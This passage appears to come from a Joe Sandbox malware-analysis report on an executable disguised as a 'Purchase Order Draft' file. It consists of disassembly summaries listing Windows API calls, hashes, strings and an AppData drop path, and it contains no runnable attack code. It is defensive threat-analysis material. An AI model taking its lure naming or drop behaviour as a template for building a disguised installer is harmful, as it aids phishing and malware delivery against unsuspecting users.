                                                              • Instruction ID: 8b53a25d375a508ca0f68064fdc939b5f25de369c98bd294fc40859475f67141
                                                              • Opcode Fuzzy Hash: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                              • Instruction Fuzzy Hash: 02A01132808000ABCA028BA0EF08C0ABB22BBB8300B008A3AB2008003082320820EB0A
                                                              APIs
                                                              • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 5231c911f6ab3084dc61dacf490c6499e9f2d5b92fa0196a3b0b3ed156b1a20b
                                                              • Instruction ID: 43bd389e684fdc992c114de42b340604c9c8a7aa9960d5983178e32e9e1c03f3
                                                              • Opcode Fuzzy Hash: 5231c911f6ab3084dc61dacf490c6499e9f2d5b92fa0196a3b0b3ed156b1a20b
                                                              • Instruction Fuzzy Hash: 42D0C9B7B141409BDB50EBB8AE8989B73A8E7913297204C73D942F20A1D178D8029A39
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404BC8
                                                              • GetDlgItem.USER32(?,00000408), ref: 00404BD3
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404C1D
                                                              • LoadBitmapW.USER32(0000006E), ref: 00404C30
                                                              • SetWindowLongW.USER32(?,000000FC,004051A8), ref: 00404C49
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C5D
                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C6F
                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404C85
                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C91
                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404CA3
                                                              • DeleteObject.GDI32(00000000), ref: 00404CA6
                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404CD1
                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404CDD
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D73
                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D9E
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DB2
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404DE1
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404DEF
                                                              • ShowWindow.USER32(?,00000005), ref: 00404E00
                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EFD
                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F62
                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404F77
                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F9B
                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404FBB
                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404FD0
                                                              • GlobalFree.KERNEL32(?), ref: 00404FE0
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405059
                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00405102
                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405111
                                                              • InvalidateRect.USER32(?,00000000,?), ref: 00405131
                                                              • ShowWindow.USER32(?,00000000), ref: 0040517F
                                                              • GetDlgItem.USER32(?,000003FE), ref: 0040518A
                                                              • ShowWindow.USER32(00000000), ref: 00405191
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                              • String ID: $M$N
                                                              • API String ID: 1638840714-813528018
                                                              • Opcode ID: f7ebdd8b268411a9b37aa70f9024469a2a71c778bc2b79fb1238a5057d52bc19
                                                              • Instruction ID: 03f87516f98afcaf774383f7594fe685c09e1d2031758133a9bfc9c340c12758
                                                              • Opcode Fuzzy Hash: f7ebdd8b268411a9b37aa70f9024469a2a71c778bc2b79fb1238a5057d52bc19
                                                              • Instruction Fuzzy Hash: 2E026DB0A00209EFEB209F54DD85AAE7BB5FB44354F10857AF610BA2E1C7789D52CF58
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                              • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                              • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                              • lstrcmpiW.KERNEL32(Call,004226E8,00000000,?,?), ref: 0040479C
                                                              • lstrcatW.KERNEL32(?,Call), ref: 004047A8
                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                                • Part of subcall function 0040574C: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040575F
                                                                • Part of subcall function 00406220: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 00406283
                                                                • Part of subcall function 00406220: CharNextW.USER32(?,?,?,00000000), ref: 00406292
                                                                • Part of subcall function 00406220: CharNextW.USER32(?,"C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 00406297
                                                                • Part of subcall function 00406220: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 004062AA
                                                              • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487C
                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404897
                                                                • Part of subcall function 004049F0: lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A91
                                                                • Part of subcall function 004049F0: wsprintfW.USER32 ref: 00404A9A
                                                                • Part of subcall function 004049F0: SetDlgItemTextW.USER32(?,004226E8), ref: 00404AAD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: A$C:\Users\user\AppData\Roaming\incontemptible\koput$Call$&B
                                                              • API String ID: 2624150263-851407628
                                                              • Opcode ID: 114b84ffbc372fa177182272010cbbd35a60563a0620183ccf333a24de688714
                                                              • Instruction ID: 99b17f69f627c4fe70adaab035ba94d9a502da106e2b73a6a76b2d9e8e29038f
                                                              • Opcode Fuzzy Hash: 114b84ffbc372fa177182272010cbbd35a60563a0620183ccf333a24de688714
                                                              • Instruction Fuzzy Hash: ECA170B1A00209ABDB11AFA5DC85AAF77B8EF85714F10843BF601B62D1D77C89418F69
                                                              APIs
                                                              • CoCreateInstance.OLE32(00407474,?,?,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                              Strings
                                                              • C:\Users\user\AppData\Roaming\incontemptible\koput, xrefs: 004020FB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CreateInstance
                                                              • String ID: C:\Users\user\AppData\Roaming\incontemptible\koput
                                                              • API String ID: 542301482-1500912455
                                                              • Opcode ID: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
                                                              • Instruction ID: b1e6e5a65ced1a5d956167907e7332dfeee254deeda5808785c26b13febdce63
                                                              • Opcode Fuzzy Hash: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
                                                              • Instruction Fuzzy Hash: 2D415F75A00105BFCB00DFA4C988EAE7BB5BF49318B20416AF505EF2D1D679AD41CB54
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FileFindFirst
                                                              • String ID:
                                                              • API String ID: 1974802433-0
                                                              • Opcode ID: de465c75c13fed098f87d81826f668e350bd36b98d1664987cc769742e30aac0
                                                              • Instruction ID: 2767565cf4098148965081e12a0ae643aa49ff73535e0165105732fd86b2d8f1
                                                              • Opcode Fuzzy Hash: de465c75c13fed098f87d81826f668e350bd36b98d1664987cc769742e30aac0
                                                              • Instruction Fuzzy Hash: 4DF05EB56101149BCB00DBA4DD499AEB378FF04318F30497AE151F31D0D6B859409B3A
                                                              APIs
                                                              • CheckDlgButton.USER32(?,-0000040A,?), ref: 004043D5
                                                              • GetDlgItem.USER32(?,000003E8), ref: 004043E9
                                                              • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404406
                                                              • GetSysColor.USER32(?), ref: 00404417
                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                              • lstrlenW.KERNEL32(?), ref: 00404438
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                              • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                              • SendMessageW.USER32(00000000), ref: 004044BA
                                                              • GetDlgItem.USER32(?,000003E8), ref: 004044E5
                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                              • SetCursor.USER32(00000000), ref: 00404539
                                                              • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,?), ref: 0040454E
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                              • SetCursor.USER32(00000000), ref: 0040455D
                                                              • SendMessageW.USER32(00000111,?,00000000), ref: 0040458C
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040459E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                              • String ID: Call$N$open
                                                              • API String ID: 3615053054-2563687911
                                                              • Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                              • Instruction ID: ef3aff8114c15a744cba6b044a82d146c21238a9e490568bd42f4e53aa973cae
                                                              • Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                              • Instruction Fuzzy Hash: CF718FB1A00209FFDB109F60DD85A6A7BA9FB94344F00853AFB01B62D1C778AD51CF99
                                                              APIs
                                                              • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E4E,?,?,?,004059C6,?,00000000,000000F1,?), ref: 00405CBA
                                                              • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,?,00405E4E,?,?,?,004059C6,?,00000000,000000F1,?), ref: 00405CDE
                                                              • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CE7
                                                                • Part of subcall function 00405B5D: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B6D
                                                                • Part of subcall function 00405B5D: lstrlenA.KERNEL32(00405D97,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B9F
                                                              • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405D04
                                                              • wsprintfA.USER32 ref: 00405D22
                                                              • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405D5D
                                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D6C
                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405DA4
                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DFA
                                                              • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405E0C
                                                              • GlobalFree.KERNEL32(00000000), ref: 00405E13
                                                              • CloseHandle.KERNEL32(00000000), ref: 00405E1A
                                                                • Part of subcall function 00405BF8: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe,80000000,00000003), ref: 00405BFC
                                                                • Part of subcall function 00405BF8: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405C1E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                              • String ID: %ls=%ls$NUL$[Rename]
                                                              • API String ID: 1265525490-899692902
                                                              • Opcode ID: a8d6815e5da54145bc517d01fd16b8e1ff93f39a7c8dcdb8ac9fdc12244dbea1
                                                              • Instruction ID: 278018eb507e55e18bba05fe136388c5c8d345875c3a2ef582da275f9efe5ed0
                                                              • Opcode Fuzzy Hash: a8d6815e5da54145bc517d01fd16b8e1ff93f39a7c8dcdb8ac9fdc12244dbea1
                                                              • Instruction Fuzzy Hash: 4C410F71604B19BFD2206B61AC4DF6B3A6CDF45754F14053BB901F62C2EA38A9018ABD
                                                              APIs
                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                              • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                              • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                              • String ID: F
                                                              • API String ID: 941294808-1304234792
                                                              • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                              • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                                              • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                              • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                                              APIs
                                                              • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 00406283
                                                              • CharNextW.USER32(?,?,?,00000000), ref: 00406292
                                                              • CharNextW.USER32(?,"C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 00406297
                                                              • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 004062AA
                                                              Strings
                                                              • "C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe", xrefs: 00406264
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00406221, 00406226
                                                              • *?|<>/":, xrefs: 00406272
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Char$Next$Prev
                                                              • String ID: "C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 589700163-3662050366
                                                              • Opcode ID: a15e7b9c92e4fac5837ba80ec03ec375c661933bbdfd6cc4147916c8a1456e26
                                                              • Instruction ID: 01726bbc4e2c448ec391ae67e872290cbd2d47d18a3812a7b55dff680105d5d8
                                                              • Opcode Fuzzy Hash: a15e7b9c92e4fac5837ba80ec03ec375c661933bbdfd6cc4147916c8a1456e26
                                                              • Instruction Fuzzy Hash: F511AB1580061295DB313B549C44B77A2F8EF99790F5240BFED96B32C0E7BC5C9286BD
                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                              • GetSysColor.USER32(00000000), ref: 0040423A
                                                              • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                              • SetBkMode.GDI32(?,?), ref: 00404252
                                                              • GetSysColor.USER32(?), ref: 00404265
                                                              • SetBkColor.GDI32(?,?), ref: 00404275
                                                              • DeleteObject.GDI32(?), ref: 0040428F
                                                              • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                              • String ID:
                                                              • API String ID: 2320649405-0
                                                              • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                              • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
